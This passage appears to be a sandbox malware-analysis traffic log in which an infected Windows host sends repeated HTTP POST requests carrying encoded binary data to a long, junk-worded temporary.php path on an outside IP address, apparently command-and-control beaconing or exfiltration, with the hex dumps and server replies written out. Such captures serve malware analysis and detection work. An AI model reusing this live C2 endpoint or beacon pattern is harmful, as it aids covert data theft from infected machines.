                                                                                        Data Ascii: YYF^[UWQ^\PUPPZYZ[[[TRU\TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*=$20'&0=*2$>?= *X!&-%.<_'<?:.Y#,Z!
                                                                                        Jan 8, 2025 18:09:17.039618015 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:17.172380924 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        40192.168.2.450047185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:17.304862976 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:17.656682968 CET2596OUTData Raw: 59 5f 46 5f 5e 59 52 58 5e 5c 50 55 50 50 5a 58 5a 5d 5b 54 54 52 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y_F_^YRX^\PUPPZXZ][TTRUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9^*=X02#363*37(<?V>&Q'=*V.Y4Y3Y:.Y#,Z!
                                                                                        Jan 8, 2025 18:09:17.977551937 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:18.110521078 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        41192.168.2.450048185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:18.273616076 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:18.625621080 CET2596OUTData Raw: 59 5f 43 59 5b 5a 57 5e 5e 5c 50 55 50 5b 5a 5e 5a 59 5b 59 54 51 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y_CY[ZW^^\PUP[Z^ZY[YTQUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>1$"('$]):5$,S)<?U>=%$=).Y'$<#--.Y#,Z!/
                                                                                        Jan 8, 2025 18:09:18.971453905 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:19.104218006 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        42192.168.2.450049185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:18.946580887 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:19.296367884 CET2192OUTData Raw: 5c 5a 43 5f 5b 5d 52 5f 5e 5c 50 55 50 5a 5a 5f 5a 58 5b 5d 54 56 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \ZC_[]R_^\PUPZZ_ZX[]TVU_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*W2028]0%<]*)3=V)/*-$):<8_'Y ..Y#,Z!+
                                                                                        Jan 8, 2025 18:09:19.751403093 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:19.775466919 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 3a 03 32 38 25 5d 20 16 31 0d 39 3e 2f 02 30 11 0b 5e 28 20 2b 10 3d 0a 38 02 3c 05 2c 5e 28 5d 31 5f 24 12 03 5d 35 2c 21 11 22 00 2c 5f 02 12 26 07 3d 32 06 54 3e 3f 30 02 3e 0e 3d 59 37 21 25 04 28 33 0b 0d 35 17 01 01 32 30 25 0f 30 0f 33 53 3f 00 34 07 38 10 32 01 22 03 21 50 0c 12 20 1b 35 01 28 12 35 16 14 07 29 38 2e 5a 31 26 2e 1f 27 39 37 13 34 33 27 57 24 23 34 56 32 38 2f 0c 27 06 2b 58 26 00 2c 52 2d 12 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 98:28%] 19>/0^( +=8<,^(]1_$]5,!",_&=2T>?0>=Y7!%(3520%03S?482"!P 5(5)8.Z1&.'9743'W$#4V28/'+X&,R- S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        43192.168.2.450050185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:19.248172045 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:19.594573975 CET2596OUTData Raw: 5c 5a 43 5b 5b 5e 52 58 5e 5c 50 55 50 5d 5a 51 5a 58 5b 5d 54 52 55 5f 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \ZC[[^RX^\PUP]ZQZX[]TRU_TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:+!!Z$"<]060X="%-(U=?P=$.S:83?'/=.Y#,Z!7
                                                                                        Jan 8, 2025 18:09:19.938519001 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:20.071338892 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:19 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        44192.168.2.450051185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:20.216026068 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:20.564621925 CET2596OUTData Raw: 5c 58 43 5b 5b 58 57 59 5e 5c 50 55 50 5d 5a 5a 5a 5f 5b 5d 54 56 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \XC[[XWY^\PUP]ZZZ_[]TVUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*%Z$1(\0&#)_-$>4=? )>3...?;3:.Y#,Z!7
                                                                                        Jan 8, 2025 18:09:20.921646118 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:21.034898043 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        45192.168.2.450052185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:21.174838066 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:21.531337023 CET2596OUTData Raw: 5c 5f 46 5d 5e 58 57 50 5e 5c 50 55 50 50 5a 58 5a 59 5b 5a 54 55 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \_F]^XWP^\PUPPZXZY[ZTUUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:=202$=9X%-?*U*2V'>6-?3';/-.Y#,Z!
                                                                                        Jan 8, 2025 18:09:21.864082098 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:21.998403072 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        46192.168.2.450053185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:22.144668102 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:22.500210047 CET2596OUTData Raw: 59 5e 43 5c 5e 5a 52 5a 5e 5c 50 55 50 5f 5a 5a 5a 53 5b 5f 54 57 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y^C\^ZRZ^\PUP_ZZZS[_TWU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9)"=^$2$&#>_1%=T(?#).&0=%-<7%<,-.Y#,Z!?
                                                                                        Jan 8, 2025 18:09:22.864509106 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:23.000451088 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        47192.168.2.450054185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:23.133805037 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:23.624526024 CET2596OUTData Raw: 59 59 43 53 5b 5f 52 5d 5e 5c 50 55 50 5f 5a 5d 5a 53 5b 5b 54 53 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YYCS[_R]^\PUP_Z]ZS[[TSUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*2='28\%6]*)'- W)?).$:.,8%?3:-.Y#,Z!?
                                                                                        Jan 8, 2025 18:09:23.823512077 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:23.954796076 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:23 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        48192.168.2.450055185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:24.100411892 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:24.454669952 CET2596OUTData Raw: 5c 59 43 5d 5e 5e 52 5b 5e 5c 50 55 50 58 5a 58 5a 5e 5b 59 54 52 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \YC]^^R[^\PUPXZXZ^[YTRUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9\>5Z%";38[*Y'8*;T>=23=:T,/%,?.=.Y#,Z!#
                                                                                        Jan 8, 2025 18:09:24.786587954 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:24.924947977 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:24 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        49192.168.2.450056185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:24.787190914 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2164
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:25.140120983 CET2164OUTData Raw: 59 59 43 5d 5b 5f 57 5e 5e 5c 50 55 50 5c 5a 51 5a 5b 5b 54 54 54 55 59 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YYC][_W^^\PUP\ZQZ[[TTTUYTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9_=16'"$]0%8*)'.<>+T)&P3>:-<7$'--.Y#,Z!3
                                                                                        Jan 8, 2025 18:09:25.451493025 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:25.752012014 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 1c 32 2b 22 04 37 01 29 09 2e 5b 38 11 26 3f 00 05 2a 0e 02 03 29 20 24 02 3c 38 28 58 28 05 2d 59 27 2c 39 5a 36 05 3d 59 22 3a 2c 5f 02 12 25 18 3f 22 02 55 3d 3f 3b 5c 3d 19 2e 02 34 32 3d 07 28 23 2d 08 35 17 30 5e 25 20 3a 54 33 32 30 0b 28 58 2b 5e 2f 3e 3a 03 36 13 21 50 0c 12 23 0b 36 06 33 0d 35 06 17 16 2b 01 21 03 32 1c 2e 55 25 17 20 07 23 33 28 0c 33 1d 2c 52 32 38 0e 54 25 3b 3b 13 25 07 06 51 2d 12 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 9892+"7).[8&?*) $<8(X(-Y',9Z6=Y":,_%?"U=?;\=.42=(#-50^% :T320(X+^/>:6!P#635+!2.U% #3(3,R28T%;;%Q- S"-S0UQ0
                                                                                        Jan 8, 2025 18:09:25.752115965 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 1c 32 2b 22 04 37 01 29 09 2e 5b 38 11 26 3f 00 05 2a 0e 02 03 29 20 24 02 3c 38 28 58 28 05 2d 59 27 2c 39 5a 36 05 3d 59 22 3a 2c 5f 02 12 25 18 3f 22 02 55 3d 3f 3b 5c 3d 19 2e 02 34 32 3d 07 28 23 2d 08 35 17 30 5e 25 20 3a 54 33 32 30 0b 28 58 2b 5e 2f 3e 3a 03 36 13 21 50 0c 12 23 0b 36 06 33 0d 35 06 17 16 2b 01 21 03 32 1c 2e 55 25 17 20 07 23 33 28 0c 33 1d 2c 52 32 38 0e 54 25 3b 3b 13 25 07 06 51 2d 12 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 9892+"7).[8&?*) $<8(X(-Y',9Z6=Y":,_%?"U=?;\=.42=(#-50^% :T320(X+^/>:6!P#635+!2.U% #3(3,R28T%;;%Q- S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        50192.168.2.450057185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:25.057559013 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
